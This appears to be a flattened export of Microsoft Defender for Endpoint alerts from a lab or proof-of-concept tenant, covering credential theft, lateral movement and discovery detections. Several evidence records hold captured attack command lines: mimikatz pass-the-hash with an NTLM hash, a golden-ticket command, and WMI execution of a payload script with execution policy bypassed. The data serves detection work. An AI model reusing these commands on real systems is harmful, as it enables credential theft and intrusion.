"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-21T02:15:38.7580909Z",
"processId": 8772,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:47.04Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-21T02:21:55.0683961Z",
"processId": 7728,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:30:44.5266667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-21T02:24:17.6331879Z",
"processId": 9364,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:30:44.7433333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-21T02:23:23.4863604Z",
"processId": 7928,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:30:44.7833333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-11-21T02:23:51.0663034Z",
"processId": 9244,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:37:40.6033333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-21T02:30:52.5211586Z",
"processId": 6204,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:39:52.6466667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-11-21T02:32:59.2288177Z",
"processId": 7708,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:39:52.7066667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-21T02:32:53.4075673Z",
"processId": 5532,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T05:12:05.38Z
|
Suspicious
|
None
|
analyst
|
NT AUTHORITY
|
S-1-5-18
| null | null |
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
|
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
|
PSEXESVC.exe
|
C:\Windows
| 8,284
|
PSEXESVC.exe
|
2022-11-18T05:10:14.6889142Z
| 620
|
2022-11-16T03:32:19.0279725Z
|
services.exe
|
C:\Windows\System32
|
Detected
|
36150b3c1b69b5c2da9df4efd86ac6c166924a48
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-18T05:12:02.97Z
|
Suspicious
|
None
|
admin
|
MSDXV2
|
S-1-5-21-2300221942-1987151257-321556088-1111
|
89b6fc86-af84-47b2-a72d-325362598b2c
|
ronhd@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-09-30T06:24:37.61Z
|
Suspicious
|
None
|
hacker
| null |
S-1-5-21-2300221942-1987151257-321556088-1104
| null | null |
6cbce4a295c163791b60fc23d285e6d84f28ee4c
|
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
|
powershell.exe
| 4,064
|
"powershell.exe"
|
2022-09-30T06:11:13.210308Z
| 416
|
2022-08-23T12:15:55.5488781Z
| null | null | null | null |
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T16:39:00.0133333Z
|
Suspicious
|
None
|
analyst
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-21T02:08:06.97Z
|
Suspicious
|
None
|
jeff
|
lab.net
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T04:50:04.1566667Z
|
Unknown
|
Active
|
Takeshi
|
TMTOWER-BOOK
|
S-1-5-21-7316772-2057538409-3008203053-1001
| null | null |
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 20,656
|
"mimikatz.exe" privilege::debug "kerberos::golden /domain:WORKGROUP /sid:S-1-5-21-7316772-2057538409-3008203053 /krbtgt: /user:Steve /ticket:C:\M365DAttack\Admin-Tickets\ticket.kirbi /ptt" exit
|
2022-11-18T04:48:53.8781061Z
| 14,616
|
2022-11-14T04:36:16.5242809Z
|
powershell.exe
|
\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
83b06aa80899050e5d4132992e36b5b8f14b64e9
|
da47dc5671-e560-4229-984b-457564996b31_1
|
47dc5671-e560-4229-984b-457564996b31_1
| 989
|
MicrosoftDefenderForEndpoint
|
2023-01-24T05:33:37.3245808Z
|
2023-01-24T05:45:51.77Z
| null |
2023-01-24T05:31:07.5276179Z
|
2023-01-24T05:43:50.6866455Z
|
Ongoing hands-on-keyboard attack via Impacket toolkit
|
Suspicious execution of a command via Impacket was observed on this device. This tool connects to other hosts to explore network shares and execute commands. Attackers might be attempting to move laterally across the network using this tool. This usage of Impacket has often been observed in hands-on-keyboard attacks, where ransomware and other payloads are installed on target devices.
|
LateralMovement
|
New
|
High
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
9c3a70ec-e18a-4f92-865a-530f73130b7c
| null | null | null |
[
"T1021.002",
"T1047",
"T1059.003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Unknown",
"deviceDnsName": "diytestmachine",
"firstSeen": "2023-01-24T04:45:42.979Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "administrator1",
"domainName": "DIYTESTMACHINE"
}
],
"mdatpDeviceId": "302293d9f276eae65553e5042156bce93cbc7148",
"onboardingStatus": "Onboarded",
"osBuild": 19044,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "None",
"tags": [],
"version": "21H2",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": "User1",
"detectionStatus": null,
"deviceId": null,
"domainName": "DIYTESTMACHINE",
"entityType": "User",
"evidenceCreationTime": "2023-01-24T05:33:37.4166667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-4215714199-1288013905-3478400915-1002",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "NETWORK SERVICE",
"detectionStatus": "Detected",
"deviceId": "302293d9f276eae65553e5042156bce93cbc7148",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2023-01-24T05:33:37.4166667Z",
"fileName": "WmiPrvSE.exe",
"filePath": "C:\\Windows\\System32\\wbem",
"ipAddress": null,
"parentProcessCreationTime": "2023-01-24T04:44:17.1940386Z",
"parentProcessFileName": "svchost.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 896,
"processCommandLine": "wmiprvse.exe -secured -Embedding",
"processCreationTime": "2023-01-24T05:30:50.8649791Z",
"processId": 7824,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "3ea7cc066317ac45f963c2227c4c7c50aa16eb7c",
"sha256": "2198a7b58bccb758036b969ddae6cc2ece07565e2659a7c541a313a0492231a3",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-20",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "User1",
"detectionStatus": "Detected",
"deviceId": "302293d9f276eae65553e5042156bce93cbc7148",
"domainName": "DIYTESTMACHINE",
"entityType": "Process",
"evidenceCreationTime": "2023-01-24T05:33:37.4166667Z",
"fileName": "cmd.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2023-01-24T05:30:50.8649791Z",
"parentProcessFileName": "WmiPrvSE.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\wbem",
"parentProcessId": 7824,
"processCommandLine": "cmd.exe /Q /c powershell -NoProfile -ExecutionPolicy Bypass -File \"C:\\Users\\administrator1\\Desktop\\SharedFolder\\payload.ps1\" 1> \\\\127.0.0.1\\SharedFolder\\__1674538248.357367 2>&1",
"processCreationTime": "2023-01-24T05:31:04.0743902Z",
"processId": 8964,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d",
"sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-4215714199-1288013905-3478400915-1002",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "NETWORK SERVICE",
"detectionStatus": "Detected",
"deviceId": "302293d9f276eae65553e5042156bce93cbc7148",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2023-01-24T05:39:47.1733333Z",
"fileName": "WmiPrvSE.exe",
"filePath": "C:\\Windows\\System32\\wbem",
"ipAddress": null,
"parentProcessCreationTime": "2023-01-24T04:44:17.1940386Z",
"parentProcessFileName": "svchost.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 896,
"processCommandLine": "wmiprvse.exe -secured -Embedding",
"processCreationTime": "2023-01-24T05:36:26.0524655Z",
"processId": 7736,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "3ea7cc066317ac45f963c2227c4c7c50aa16eb7c",
"sha256": "2198a7b58bccb758036b969ddae6cc2ece07565e2659a7c541a313a0492231a3",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-20",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "User1",
"detectionStatus": "Detected",
"deviceId": "302293d9f276eae65553e5042156bce93cbc7148",
"domainName": "DIYTESTMACHINE",
"entityType": "Process",
"evidenceCreationTime": "2023-01-24T05:39:47.1733333Z",
"fileName": "cmd.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2023-01-24T05:36:26.0524655Z",
"parentProcessFileName": "WmiPrvSE.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\wbem",
"parentProcessId": 7736,
"processCommandLine": "cmd.exe /Q /c powershell -NoProfile -ExecutionPolicy Bypass -File \"C:\\Users\\administrator1\\Desktop\\SharedFolder\\payload.ps1\" 1> \\\\127.0.0.1\\SharedFolder\\__1674538583.8648584 2>&1",
"processCreationTime": "2023-01-24T05:36:38.826505Z",
"processId": 884,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d",
"sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-4215714199-1288013905-3478400915-1002",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "NETWORK SERVICE",
"detectionStatus": "Detected",
"deviceId": "302293d9f276eae65553e5042156bce93cbc7148",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2023-01-24T05:45:51.6833333Z",
"fileName": "WmiPrvSE.exe",
"filePath": "C:\\Windows\\System32\\wbem",
"ipAddress": null,
"parentProcessCreationTime": "2023-01-24T04:44:17.1940386Z",
"parentProcessFileName": "svchost.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 896,
"processCommandLine": "wmiprvse.exe -secured -Embedding",
"processCreationTime": "2023-01-24T05:43:32.4631151Z",
"processId": 4476,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "3ea7cc066317ac45f963c2227c4c7c50aa16eb7c",
"sha256": "2198a7b58bccb758036b969ddae6cc2ece07565e2659a7c541a313a0492231a3",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-20",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "User1",
"detectionStatus": "Detected",
"deviceId": "302293d9f276eae65553e5042156bce93cbc7148",
"domainName": "DIYTESTMACHINE",
"entityType": "Process",
"evidenceCreationTime": "2023-01-24T05:45:51.6833333Z",
"fileName": "cmd.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2023-01-24T05:43:32.4631151Z",
"parentProcessFileName": "WmiPrvSE.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\wbem",
"parentProcessId": 4476,
"processCommandLine": "cmd.exe /Q /c powershell -NoProfile -ExecutionPolicy Bypass -File \"C:\\Users\\administrator1\\Desktop\\SharedFolder\\payload.ps1\" 1> \\\\127.0.0.1\\SharedFolder\\__1674538878.1586335 2>&1",
"processCreationTime": "2023-01-24T05:43:49.9375398Z",
"processId": 1140,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d",
"sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-4215714199-1288013905-3478400915-1002",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:24:37.89Z
|
Suspicious
|
None
|
ronhd
|
prod.env
|
S-1-5-21-2300221942-1987151257-321556088-1111
|
89b6fc86-af84-47b2-a72d-325362598b2c
|
ronhd@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2023-01-24T05:33:37.4166667Z
|
Suspicious
|
Active
|
User1
|
DIYTESTMACHINE
|
S-1-5-21-4215714199-1288013905-3478400915-1002
| null | null |
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
|
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
| 9,672
|
copy con test.txt
|
2023-01-24T05:31:04.2740186Z
| 8,964
|
2023-01-24T05:31:04.0743902Z
|
cmd.exe
|
C:\Windows\System32
|
Detected
|
302293d9f276eae65553e5042156bce93cbc7148
|
da638072963841363227_-482895426
|
fef29d86-93f2-4af8-b489-d5707fb5909c
| 975
|
MicrosoftDefenderForEndpoint
|
2022-12-22T08:59:44.1363425Z
|
2022-12-22T09:25:44.3733333Z
| null |
2022-12-22T08:27:59.3887959Z
|
2022-12-22T08:48:41.1881268Z
|
Suspicious User Account Discovery
|
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
|
Discovery
|
New
|
Low
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
| null | null | null |
[
"T1033",
"T1106"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv8-dc.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T01:05:46.8493187Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Defender",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "3ad3fb0567038c2ec2e59e76690c2e6c01253af9",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Medium",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "3aea8abd-ee92-4200-9515-789aaa453909"
}
}
] |
[
{
"aadUserId": null,
"accountName": "Defender",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:59:44.16Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "Defender@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-500",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:59:44.2566667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1107",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045931470659526_1077639846
|
58f9697c-4be9-4140-af1f-34d50cbbe085
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:05:47.0659755Z
|
2022-11-21T02:17:47.6433333Z
| null |
2022-11-21T02:02:27.1005817Z
|
2022-11-21T02:15:09.1240511Z
|
Malicious credential theft tool execution detected
|
A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
|
CredentialAccess
|
New
|
High
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
| null | null | null |
[
"T1003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "None",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
